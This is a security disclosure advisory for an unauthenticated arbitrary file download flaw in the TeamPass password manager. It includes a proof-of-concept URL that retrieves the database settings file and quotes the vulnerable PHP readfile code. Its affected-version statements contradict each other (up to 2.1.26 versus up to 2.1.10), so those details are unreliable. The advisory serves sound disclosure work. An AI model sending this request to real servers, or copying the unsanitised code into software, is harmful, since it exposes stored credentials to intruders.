TeamPass Passwords Management System 2.1.26 - Arbitrary File Download

1. ADVISORY INFORMATION
========================================
Title: TeamPass Passwords Management System via Unauth File Download and Arbitrary File Download
Application: TeamPass Passwords Management System
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: TeamPass Passwords Management System <= 2.1.26
Bugs:  Arbitrary File Download
Date of found:  21.03.2016
Reported:  09.05.2016
Date of Public Advisory: 13.05.2016
Author: Hasan Emre Ozer 


2. CREDIT
========================================
This vulnerability was identified during penetration test
by Hasan Emre Ozer & Halit Alptekin from PRODAFT / INVICTUS

Thank you Mehmet Ince for support

3. DESCRIPTION
========================================
We deciced to publish the vulnerability after its fix in release 2.1.26

4. VERSIONS AFFECTED
========================================
TeamPass Passwords Management System <= 2.1.10


5. TECHNICAL DETAILS & POC
========================================
Using 'downloadFile.php' file from 'sources' directory we can download any file.


Proof of Concept (POC)
 
Example for downloading database configuration:
 
http://teampass/sources/downloadFile.php?sub=includes&file=settings.php


Technical Details
<?php 
......

header("Content-disposition: attachment; filename=".rawurldecode($_GET['name']));
header("Content-Type: application/octet-stream");
header("Pragma: public");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0, public");
header("Expires: 0");
readfile('../'.$_GET['sub'].'/'.basename($_GET['file']));
?>

$_GET['sub'] and $_GET['file'] parameters vulnerable in readfile function. 



6. SOLUTION
========================================
Update to the latest version v2.1.26


7. REFERENCES
========================================
http://teampass.net/2016-05-13-release-2.1.26